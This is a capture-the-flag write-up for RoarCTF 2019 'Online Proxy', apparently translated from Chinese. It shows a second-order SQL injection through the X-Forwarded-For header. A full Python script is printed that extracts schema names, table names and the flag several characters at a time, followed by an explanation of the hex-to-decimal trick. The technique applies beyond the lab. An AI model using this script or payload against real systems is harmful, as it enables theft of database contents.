Article directory
[RoarCTF 2019Online Proxy] SQL clever blind injection
problem solving
Found in the source code interface:Current Ip
We will associate: X-Forwarded-Forto modify ip:
As a result, we found that the response will be Last Ipechoed out, and we used dirsearchthe scan todb.php
We naturally think of databases. When we use X-Forwarded-Forthe request, the last value will be echoed inLast Ip
There should be sql injection here.
If we pass a sql into XFF, then enter a random value for the second time, store the sql in the database, and input the same value for the third time, a sql query will occur, and the previous sql statement will be queried, resulting in a second injection
We verify that we can use single quotes to close :
The first XFF: 0' or '114514, the second time: leekos, the third time: leekos
In the third query it will be114514
screenplay
So we need to write scripts:
import requests
url = "http://node4.buuoj.cn:27640/"
def execsql(sql):
result = ""
payload = "0'|length(("+sql+"))|'0"
session = requests.session()
r = session.get(url,headers={
'X-Forwarded-For':payload})
r = session.get(url,headers={
'X-Forwarded-For':'leekos'})
r = session.get(url,headers={
'X-Forwarded-For':'leekos'})
start = r.text.find("Last Ip: ") + 9
end = r.text.find(" -->",start)
length = int(r.text[start:end])
print("[+]长度:"+str(length))
for i in range(1,length+1,5): # 1次查5个字符,妙
payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql,i)
r = session.get(url, headers={
'X-Forwarded-For': payload})
r = session.get(url, headers={
'X-Forwarded-For': 'leekos'})
r = session.get(url, headers={
'X-Forwarded-For': 'leekos'})
start = r.text.find("Last Ip: ") + 9
end = r.text.find(" -->", start)
res = int(r.text[start:end])
result += bytes.fromhex(hex(res)[2:]).decode("utf-8")
print(result)
return result
# print("数据库名:" + execsql("select group_concat(schema_name) from information_schema.schemata"))
# print("表名:" + execsql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'"))
# print("列名:" + execsql("select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e' and table_schema='F4l9_D4t4B45e'"))
print("flag:" + execsql("select group_concat(`F4l9_C01uMn`) from F4l9_D4t4B45e.F4l9_t4b1e"))
script analysis
This script is very ingenious. Unlike the scripts I have encountered before, this script can query multiple characters at a time through blind injection .
The principle is to convert the string to hexadecimal, then convert it to decimal, read it out, and finally convert the decimal to hexadecimal, and finally convert it to a string, using
Conversion between string and hexadecimal
for example:
hex('abc')=616263conv(hex('abc'),16,10) = 6382179, and then convert the hexadecimal of abc to decimal through the sql function
In sql, hexadecimal can be automatically converted to a string:
This approach greatly improves the speed of the query!
bytes.fromhex() This function converts hexadecimal numbers into bytes, and then decode() decodes them into characters
The point of the whole script is as follows:
payload = "0'|conv(hex(substr(({}),{},5)),16,10)|'0".format(sql,i)
res = int(r.text[start:end])
result += bytes.fromhex(hex(res)[2:]).decode("utf-8")
First, through sql query, take out part of the results, then convert to hexadecimal, and then convert to decimal
Then requeststake out the returned result, convert it into hexadecimal, and finally convert it into characters
In this way, multiple characters can be queried at once